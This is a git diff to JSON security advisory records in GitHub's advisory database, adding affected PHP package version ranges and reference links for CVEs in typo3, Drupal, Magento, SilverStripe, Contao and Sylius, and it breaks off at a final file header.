diff --git a/advisories/github-reviewed/2018/09/GHSA-pj7m-g53m-7638/GHSA-pj7m-g53m-7638.json b/advisories/github-reviewed/2018/09/GHSA-pj7m-g53m-7638/GHSA-pj7m-g53m-7638.json index cf4d2a977f8f2..b9052935a1b7c 100644 --- a/advisories/github-reviewed/2018/09/GHSA-pj7m-g53m-7638/GHSA-pj7m-g53m-7638.json +++ b/advisories/github-reviewed/2018/09/GHSA-pj7m-g53m-7638/GHSA-pj7m-g53m-7638.json @@ -33,6 +33,82 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.7.23" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.7.23" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.4" + } + ] + } + ] } ], "references": [ @@ -60,6 +136,14 @@ "type": "WEB", "url": "https://blog.getbootstrap.com/2018/07/12/bootstrap-4-1-2/" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2018-14041.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2018-14041.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/twbs/bootstrap" @@ -88,6 +172,10 @@ "type": "WEB", "url": "https://seclists.org/bugtraq/2019/May/18" }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-core-sa-2019-006" + }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" diff --git a/advisories/github-reviewed/2018/11/GHSA-g68x-vvqq-pvw3/GHSA-g68x-vvqq-pvw3.json b/advisories/github-reviewed/2018/11/GHSA-g68x-vvqq-pvw3/GHSA-g68x-vvqq-pvw3.json index ad037582cab60..7e9e3a8168926 100644 --- a/advisories/github-reviewed/2018/11/GHSA-g68x-vvqq-pvw3/GHSA-g68x-vvqq-pvw3.json +++ b/advisories/github-reviewed/2018/11/GHSA-g68x-vvqq-pvw3/GHSA-g68x-vvqq-pvw3.json @@ -33,6 +33,82 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.7.21" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.7.21" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.2" + } + ] + } + ] } ], "references": [ @@ -48,10 +124,22 @@ "type": "WEB", "url": "https://ckeditor.com/cke4/release/CKEditor-4.11.0" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2018-17960.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2018-17960.yaml" + }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-g68x-vvqq-pvw3" }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-core-sa-2018-005" + }, { "type": "WEB", "url": "https://web.archive.org/web/20200227030123/http://www.securityfocus.com/bid/109205" diff --git a/advisories/github-reviewed/2019/09/GHSA-3v43-877x-qgmq/GHSA-3v43-877x-qgmq.json b/advisories/github-reviewed/2019/09/GHSA-3v43-877x-qgmq/GHSA-3v43-877x-qgmq.json index 5b6a1381bf5aa..60b76696e7d17 100644 --- a/advisories/github-reviewed/2019/09/GHSA-3v43-877x-qgmq/GHSA-3v43-877x-qgmq.json +++ b/advisories/github-reviewed/2019/09/GHSA-3v43-877x-qgmq/GHSA-3v43-877x-qgmq.json @@ -48,6 +48,10 @@ "type": "WEB", "url": "https://github.com/thephpleague/commonmark/issues/353" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/league/commonmark/CVE-2019-10010.yaml" + }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-3v43-877x-qgmq" diff --git a/advisories/github-reviewed/2019/10/GHSA-v3f6-f29f-rgvp/GHSA-v3f6-f29f-rgvp.json b/advisories/github-reviewed/2019/10/GHSA-v3f6-f29f-rgvp/GHSA-v3f6-f29f-rgvp.json index 7e6653c5f0e44..28fff3ddb9666 100644 --- a/advisories/github-reviewed/2019/10/GHSA-v3f6-f29f-rgvp/GHSA-v3f6-f29f-rgvp.json +++ b/advisories/github-reviewed/2019/10/GHSA-v3f6-f29f-rgvp/GHSA-v3f6-f29f-rgvp.json @@ -33,6 +33,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0" + }, + { + "fixed": "8.3.7" + } + ] + } + ] } ], "references": [ @@ -40,6 +59,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-6923" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/core/CVE-2017-6923.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/drupal/CVE-2017-6923.yaml" + }, + { + "type": "WEB", + "url": "https://www.drupal.org/SA-CORE-2017-004" + }, { "type": "WEB", "url": "https://www.drupal.org/forum/newsletters/security-advisories-for-drupal-core/2017-08-16/drupal-core-multiple" diff --git a/advisories/github-reviewed/2019/11/GHSA-6r58-4xgr-gm6m/GHSA-6r58-4xgr-gm6m.json b/advisories/github-reviewed/2019/11/GHSA-6r58-4xgr-gm6m/GHSA-6r58-4xgr-gm6m.json index 02f7c741fc848..891fd3eafb9e8 100644 --- a/advisories/github-reviewed/2019/11/GHSA-6r58-4xgr-gm6m/GHSA-6r58-4xgr-gm6m.json +++ b/advisories/github-reviewed/2019/11/GHSA-6r58-4xgr-gm6m/GHSA-6r58-4xgr-gm6m.json @@ -25,10 +25,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "4.0.0" + "introduced": "4.4.0" }, { - "fixed": "4.3.6" + "fixed": "4.4.4" } ] } @@ -44,10 +44,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "4.4.0" + "introduced": "4.3.0" }, { - "fixed": "4.4.4" + "fixed": "4.3.5" } ] } @@ -63,6 +63,10 @@ "type": "WEB", "url": "https://forum.silverstripe.org/c/releases" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/framework/CVE-2019-12617.yaml" + }, { "type": "WEB", "url": "https://www.silverstripe.org/blog/tag/release" @@ -74,6 +78,10 @@ { "type": "WEB", "url": "https://www.silverstripe.org/download/security-releases/CVE-2019-12617" + }, + { + "type": "WEB", + "url": "https://www.silverstripe.org/download/security-releases/cve-2019-12617/" } ], "database_specific": { diff --git a/advisories/github-reviewed/2019/11/GHSA-89ch-hqf9-rgp3/GHSA-89ch-hqf9-rgp3.json b/advisories/github-reviewed/2019/11/GHSA-89ch-hqf9-rgp3/GHSA-89ch-hqf9-rgp3.json index 754dce1ac7a6e..1d7f1230d257a 100644 --- a/advisories/github-reviewed/2019/11/GHSA-89ch-hqf9-rgp3/GHSA-89ch-hqf9-rgp3.json +++ b/advisories/github-reviewed/2019/11/GHSA-89ch-hqf9-rgp3/GHSA-89ch-hqf9-rgp3.json @@ -49,6 +49,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "magento/product-community-edition" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.2" + }, + { + "fixed": "2.2.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "magento/product-community-edition" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.3" + }, + { + "fixed": "2.3.2-p2" + } + ] + } + ] } ], "references": [ diff --git a/advisories/github-reviewed/2019/11/GHSA-cg8j-8w52-735v/GHSA-cg8j-8w52-735v.json b/advisories/github-reviewed/2019/11/GHSA-cg8j-8w52-735v/GHSA-cg8j-8w52-735v.json index 3e09915a409ad..94c42957f4775 100644 --- a/advisories/github-reviewed/2019/11/GHSA-cg8j-8w52-735v/GHSA-cg8j-8w52-735v.json +++ b/advisories/github-reviewed/2019/11/GHSA-cg8j-8w52-735v/GHSA-cg8j-8w52-735v.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-cg8j-8w52-735v", - "modified": "2021-12-03T14:39:16Z", + "modified": "2024-02-05T10:39:45Z", "published": "2019-11-12T23:01:25Z", "aliases": [ "CVE-2019-12204" @@ -18,26 +18,7 @@ { "package": { "ecosystem": "Packagist", - "name": "silverstripe/framework" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0" - }, - { - "fixed": "4.3.6" - } - ] - } - ] - }, - { - "package": { - "ecosystem": "Packagist", - "name": "silverstripe/framework" + "name": "silverstripe/cms" }, "ranges": [ { @@ -56,36 +37,17 @@ { "package": { "ecosystem": "Packagist", - "name": "silverstripe/cms" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0" - }, - { - "fixed": "4.3.6" - } - ] - } - ] - }, - { - "package": { - "ecosystem": "Packagist", - "name": "silverstripe/cms" + "name": "silverstripe/framework" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "4.4.0" + "introduced": "4.1.0" }, { - "fixed": "4.4.4" + "fixed": "4.3.5" } ] } @@ -101,6 +63,10 @@ "type": "WEB", "url": "https://forum.silverstripe.org/c/releases" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/framework/CVE-2019-12204.yaml" + }, { "type": "WEB", "url": "https://packagist.org/packages/silverstripe/cms" @@ -116,6 +82,10 @@ { "type": "WEB", "url": "https://www.silverstripe.org/download/security-releases/CVE-2019-12204" + }, + { + "type": "WEB", + "url": "https://www.silverstripe.org/download/security-releases/cve-2019-12204/" } ], "database_specific": { @@ -125,6 +95,6 @@ "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2019-10-01T18:05:09Z", - "nvd_published_at": null + "nvd_published_at": "2019-09-25T19:15:10Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2019/11/GHSA-jvx5-rm6q-gx7p/GHSA-jvx5-rm6q-gx7p.json b/advisories/github-reviewed/2019/11/GHSA-jvx5-rm6q-gx7p/GHSA-jvx5-rm6q-gx7p.json index 334dccaccaf90..a2a7aaa9a7527 100644 --- a/advisories/github-reviewed/2019/11/GHSA-jvx5-rm6q-gx7p/GHSA-jvx5-rm6q-gx7p.json +++ b/advisories/github-reviewed/2019/11/GHSA-jvx5-rm6q-gx7p/GHSA-jvx5-rm6q-gx7p.json @@ -90,6 +90,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "silverstripe/assets" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0.0" + }, + { + "fixed": "1.3.5" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "silverstripe/assets" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.4.0" + }, + { + "fixed": "1.4.4" + } + ] + } + ] } ], "references": [ @@ -101,6 +139,10 @@ "type": "WEB", "url": "https://forum.silverstripe.org/c/releases" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/assets/CVE-2019-12245.yaml" + }, { "type": "WEB", "url": "https://www.silverstripe.org/download/security-releases/" @@ -108,6 +150,10 @@ { "type": "WEB", "url": "https://www.silverstripe.org/download/security-releases/CVE-2019-12245" + }, + { + "type": "WEB", + "url": "https://www.silverstripe.org/download/security-releases/cve-2019-12245/" } ], "database_specific": { diff --git a/advisories/github-reviewed/2019/11/GHSA-pqm6-cgwr-x6pf/GHSA-pqm6-cgwr-x6pf.json b/advisories/github-reviewed/2019/11/GHSA-pqm6-cgwr-x6pf/GHSA-pqm6-cgwr-x6pf.json index 0d2f7df2d63de..5487577299ce6 100644 --- a/advisories/github-reviewed/2019/11/GHSA-pqm6-cgwr-x6pf/GHSA-pqm6-cgwr-x6pf.json +++ b/advisories/github-reviewed/2019/11/GHSA-pqm6-cgwr-x6pf/GHSA-pqm6-cgwr-x6pf.json @@ -25,10 +25,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "3.0.0" }, { - "fixed": "2.1.1" + "fixed": "3.0.4" } ] } @@ -44,10 +44,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "3.0.0" + "introduced": "1.0.0" }, { - "fixed": "3.0.4" + "fixed": "2.1.1" } ] } @@ -63,6 +63,10 @@ "type": "WEB", "url": "https://github.com/robrichards/xmlseclibs/commit/0a53d3c3aa87564910cae4ed01416441d3ae0db5" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/robrichards/xmlseclibs/CVE-2019-3465.yaml" + }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00003.html" diff --git a/advisories/github-reviewed/2019/11/GHSA-vvwv-h69m-wg6f/GHSA-vvwv-h69m-wg6f.json b/advisories/github-reviewed/2019/11/GHSA-vvwv-h69m-wg6f/GHSA-vvwv-h69m-wg6f.json index 911ab922bf494..506a00252020a 100644 --- a/advisories/github-reviewed/2019/11/GHSA-vvwv-h69m-wg6f/GHSA-vvwv-h69m-wg6f.json +++ b/advisories/github-reviewed/2019/11/GHSA-vvwv-h69m-wg6f/GHSA-vvwv-h69m-wg6f.json @@ -48,6 +48,10 @@ "type": "WEB", "url": "https://github.com/PHPOffice/PhpSpreadsheet/commit/0e6238c69e863b58aeece61e48ea032696c6dccd" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/phpoffice/phpspreadsheet/CVE-2019-12331.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/PHPOffice/PhpSpreadsheet" diff --git a/advisories/github-reviewed/2019/11/GHSA-w7r7-r8r9-vrg2/GHSA-w7r7-r8r9-vrg2.json b/advisories/github-reviewed/2019/11/GHSA-w7r7-r8r9-vrg2/GHSA-w7r7-r8r9-vrg2.json index 2e9f39518a863..7bc9bccd7b564 100644 --- a/advisories/github-reviewed/2019/11/GHSA-w7r7-r8r9-vrg2/GHSA-w7r7-r8r9-vrg2.json +++ b/advisories/github-reviewed/2019/11/GHSA-w7r7-r8r9-vrg2/GHSA-w7r7-r8r9-vrg2.json @@ -25,10 +25,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "3.7.0" }, { - "fixed": "3.6.8" + "fixed": "3.7.4" } ] } @@ -44,10 +44,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "3.7.0" + "introduced": "4.4.0" }, { - "fixed": "3.7.4" + "fixed": "4.4.4" } ] } @@ -63,10 +63,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "4.0.0" + "introduced": "3.6.0" }, { - "fixed": "4.3.6" + "fixed": "3.6.8" } ] } @@ -82,10 +82,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "4.4.0" + "introduced": "4.0.0" }, { - "fixed": "4.4.4" + "fixed": "4.3.5" } ] } @@ -101,6 +101,10 @@ "type": "WEB", "url": "https://forum.silverstripe.org/c/releases" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/framework/CVE-2019-12203.yaml" + }, { "type": "WEB", "url": "https://github.com/silverstripe/silverstripe-framework/blob/4/docs/en/04_Changelogs/4.4.4.md#444" @@ -112,6 +116,10 @@ { "type": "WEB", "url": "https://www.silverstripe.org/download/security-releases/CVE-2019-12203" + }, + { + "type": "WEB", + "url": "https://www.silverstripe.org/download/security-releases/cve-2019-12203/" } ], "database_specific": { diff --git a/advisories/github-reviewed/2019/11/GHSA-xcrg-29h7-h4cj/GHSA-xcrg-29h7-h4cj.json b/advisories/github-reviewed/2019/11/GHSA-xcrg-29h7-h4cj/GHSA-xcrg-29h7-h4cj.json index 2748670a28d9a..7bb15386a11df 100644 --- a/advisories/github-reviewed/2019/11/GHSA-xcrg-29h7-h4cj/GHSA-xcrg-29h7-h4cj.json +++ b/advisories/github-reviewed/2019/11/GHSA-xcrg-29h7-h4cj/GHSA-xcrg-29h7-h4cj.json @@ -56,6 +56,10 @@ "type": "WEB", "url": "https://github.com/PHPOffice/PhpSpreadsheet/commit/0f8f071e24ee8b114d894ac172f77dc250e5bfa4" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/phpoffice/phpspreadsheet/CVE-2018-19277.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/PHPOffice/PhpSpreadsheet" diff --git a/advisories/github-reviewed/2019/11/GHSA-xm6j-x342-gwq9/GHSA-xm6j-x342-gwq9.json b/advisories/github-reviewed/2019/11/GHSA-xm6j-x342-gwq9/GHSA-xm6j-x342-gwq9.json index 4f4044619ce1f..f8fe3b7bf3ab2 100644 --- a/advisories/github-reviewed/2019/11/GHSA-xm6j-x342-gwq9/GHSA-xm6j-x342-gwq9.json +++ b/advisories/github-reviewed/2019/11/GHSA-xm6j-x342-gwq9/GHSA-xm6j-x342-gwq9.json @@ -1,12 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-xm6j-x342-gwq9", - "modified": "2021-07-27T22:02:46Z", + "modified": "2024-02-07T18:26:10Z", "published": "2019-11-12T23:01:05Z", "aliases": [ "CVE-2019-16409" ], - "summary": "Unpublished files are exposed publicly", + "summary": "SilverStripe Versioned Files module Unpublished files are exposed publicly", "details": "In the Versioned Files module through 2.0.3 for SilverStripe 3.x, unpublished versions of files are publicly exposed to anyone who can guess their URL. This guess could be highly informed by a basic understanding of the symbiote/silverstripe-versionedfiles source code. (Users who upgrade from SilverStripe 3.x to 4.x and had Versioned Files installed have no further need for this module, because the 4.x release has built-in versioning. However, nothing in the upgrade process automates the destruction of these insecure artefacts, nor alerts the user to the criticality of destruction.)", "severity": [ { @@ -33,6 +33,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "silverstripe/framework" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.3.5" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "silverstripe/framework" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.4" + } + ] + } + ] } ], "references": [ @@ -40,6 +78,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16409" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/framework/CVE-2019-16409.yaml" + }, { "type": "WEB", "url": "https://github.com/silverstripe/silverstripe-framework" @@ -51,6 +93,10 @@ { "type": "WEB", "url": "https://www.silverstripe.org/download/security-releases/cve-2019-16409" + }, + { + "type": "WEB", + "url": "https://www.silverstripe.org/download/security-releases/cve-2019-16409/" } ], "database_specific": { diff --git a/advisories/github-reviewed/2019/11/GHSA-xv69-f7x5-r4qw/GHSA-xv69-f7x5-r4qw.json b/advisories/github-reviewed/2019/11/GHSA-xv69-f7x5-r4qw/GHSA-xv69-f7x5-r4qw.json index ae94feee37577..3af420c2498fd 100644 --- a/advisories/github-reviewed/2019/11/GHSA-xv69-f7x5-r4qw/GHSA-xv69-f7x5-r4qw.json +++ b/advisories/github-reviewed/2019/11/GHSA-xv69-f7x5-r4qw/GHSA-xv69-f7x5-r4qw.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xv69-f7x5-r4qw", - "modified": "2023-09-06T13:45:11Z", + "modified": "2024-02-02T18:12:48Z", "published": "2019-11-12T22:59:43Z", "aliases": [ "CVE-2019-8145" @@ -47,7 +47,7 @@ "introduced": "2.3" }, { - "fixed": "2.3.3" + "fixed": "2.3.2-p1" } ] } @@ -79,6 +79,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2019-11-12T22:12:58Z", - "nvd_published_at": null + "nvd_published_at": "2019-11-06T01:15:25Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2019/12/GHSA-6rmq-x2hv-vxpp/GHSA-6rmq-x2hv-vxpp.json b/advisories/github-reviewed/2019/12/GHSA-6rmq-x2hv-vxpp/GHSA-6rmq-x2hv-vxpp.json index 18d25ba2fb415..6de001300e14d 100644 --- a/advisories/github-reviewed/2019/12/GHSA-6rmq-x2hv-vxpp/GHSA-6rmq-x2hv-vxpp.json +++ b/advisories/github-reviewed/2019/12/GHSA-6rmq-x2hv-vxpp/GHSA-6rmq-x2hv-vxpp.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6rmq-x2hv-vxpp", - "modified": "2023-09-08T14:19:06Z", + "modified": "2024-02-05T15:41:44Z", "published": "2019-12-02T18:11:25Z", "aliases": [ "CVE-2019-6338" @@ -106,6 +106,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2019-12-02T00:34:49Z", - "nvd_published_at": null + "nvd_published_at": "2019-01-22T14:29:00Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2019/12/GHSA-79gr-58r3-pwm3/GHSA-79gr-58r3-pwm3.json b/advisories/github-reviewed/2019/12/GHSA-79gr-58r3-pwm3/GHSA-79gr-58r3-pwm3.json index c972de63a14e7..6bc78953566bd 100644 --- a/advisories/github-reviewed/2019/12/GHSA-79gr-58r3-pwm3/GHSA-79gr-58r3-pwm3.json +++ b/advisories/github-reviewed/2019/12/GHSA-79gr-58r3-pwm3/GHSA-79gr-58r3-pwm3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-79gr-58r3-pwm3", - "modified": "2023-09-21T19:46:51Z", + "modified": "2024-02-01T15:48:28Z", "published": "2019-12-02T18:07:16Z", "aliases": [ "CVE-2019-18889" @@ -147,6 +147,10 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/releases/tag/v4.3.8" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UED22BOXTL2SSFMGYKA64ZFHGLLJG3EA/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UED22BOXTL2SSFMGYKA64ZFHGLLJG3EA/" @@ -171,6 +175,6 @@ "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2019-12-01T19:45:07Z", - "nvd_published_at": null + "nvd_published_at": "2019-11-21T23:15:13Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2019/12/GHSA-wjx8-cgrm-hh8p/GHSA-wjx8-cgrm-hh8p.json b/advisories/github-reviewed/2019/12/GHSA-wjx8-cgrm-hh8p/GHSA-wjx8-cgrm-hh8p.json index a0c3c39605a98..24dd7077e8c10 100644 --- a/advisories/github-reviewed/2019/12/GHSA-wjx8-cgrm-hh8p/GHSA-wjx8-cgrm-hh8p.json +++ b/advisories/github-reviewed/2019/12/GHSA-wjx8-cgrm-hh8p/GHSA-wjx8-cgrm-hh8p.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-wjx8-cgrm-hh8p", - "modified": "2023-04-25T16:32:33Z", + "modified": "2024-02-05T10:52:24Z", "published": "2019-12-17T22:53:10Z", "aliases": [ "CVE-2019-19745" @@ -52,6 +52,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/contao" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.4.46" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/contao" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.5.0" + }, + { + "fixed": "4.8.6" + } + ] + } + ] } ], "references": [ @@ -71,6 +109,10 @@ "type": "WEB", "url": "https://contao.org/en/security-advisories/unrestricted-file-uploads.html" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/contao/CVE-2019-19745.yaml" + }, { "type": "WEB", "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/core-bundle/CVE-2019-19745.yaml" @@ -87,6 +129,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2019-12-17T19:42:31Z", - "nvd_published_at": null + "nvd_published_at": "2019-12-17T15:15:25Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2020/01/GHSA-8vp7-j5cj-vvm2/GHSA-8vp7-j5cj-vvm2.json b/advisories/github-reviewed/2020/01/GHSA-8vp7-j5cj-vvm2/GHSA-8vp7-j5cj-vvm2.json index d1bada0c5637d..878cbc2e7c9b7 100644 --- a/advisories/github-reviewed/2020/01/GHSA-8vp7-j5cj-vvm2/GHSA-8vp7-j5cj-vvm2.json +++ b/advisories/github-reviewed/2020/01/GHSA-8vp7-j5cj-vvm2/GHSA-8vp7-j5cj-vvm2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8vp7-j5cj-vvm2", - "modified": "2021-01-08T20:32:44Z", + "modified": "2024-02-07T18:42:55Z", "published": "2020-01-31T18:00:43Z", "aliases": [ "CVE-2020-5220" @@ -25,10 +25,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.4.0" }, { - "fixed": "1.3.13" + "fixed": "1.4.6" } ] } @@ -44,10 +44,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "1.4.0" + "introduced": "1.5.0" }, { - "fixed": "1.4.6" + "fixed": "1.5.1" } ] } @@ -63,10 +63,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "1.5.0" + "introduced": "1.6.0" }, { - "fixed": "1.5.1" + "fixed": "1.6.3" } ] } @@ -75,17 +75,17 @@ { "package": { "ecosystem": "Packagist", - "name": "sylius/resource-bundle" + "name": "sylius/sylius" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "1.6.0" + "introduced": "0" }, { - "fixed": "1.6.3" + "fixed": "1.3.12" } ] } @@ -101,10 +101,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.4.0" }, { - "fixed": "1.3.12" + "fixed": "1.4.4" } ] } @@ -113,17 +113,17 @@ { "package": { "ecosystem": "Packagist", - "name": "sylius/sylius" + "name": "sylius/resource-bundle" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "1.4.0" + "introduced": "1.0.0" }, { - "fixed": "1.4.4" + "fixed": "1.3.13" } ] } @@ -150,11 +150,12 @@ ], "database_specific": { "cwe_ids": [ + "CWE-200", "CWE-444" ], "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2020-01-27T20:11:32Z", - "nvd_published_at": null + "nvd_published_at": "2020-01-27T21:15:11Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2020/01/GHSA-gp2m-7cfp-h6gf/GHSA-gp2m-7cfp-h6gf.json b/advisories/github-reviewed/2020/01/GHSA-gp2m-7cfp-h6gf/GHSA-gp2m-7cfp-h6gf.json index 297451312ac44..22dd7ce7c9a8a 100644 --- a/advisories/github-reviewed/2020/01/GHSA-gp2m-7cfp-h6gf/GHSA-gp2m-7cfp-h6gf.json +++ b/advisories/github-reviewed/2020/01/GHSA-gp2m-7cfp-h6gf/GHSA-gp2m-7cfp-h6gf.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-gp2m-7cfp-h6gf", - "modified": "2021-08-19T16:44:17Z", + "modified": "2024-02-07T18:42:34Z", "published": "2020-01-24T21:28:06Z", "aliases": [ "CVE-2017-12873" @@ -48,6 +48,10 @@ "type": "WEB", "url": "https://github.com/simplesamlphp/simplesamlphp/commit/90dca835158495b173808273e7df127303b8b953" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/simplesamlphp/simplesamlphp/CVE-2017-12873.yaml" + }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2017/12/msg00007.html" diff --git a/advisories/github-reviewed/2020/01/GHSA-p9cm-r7jg-8q3g/GHSA-p9cm-r7jg-8q3g.json b/advisories/github-reviewed/2020/01/GHSA-p9cm-r7jg-8q3g/GHSA-p9cm-r7jg-8q3g.json index f4731e443eb85..2c19d883522f8 100644 --- 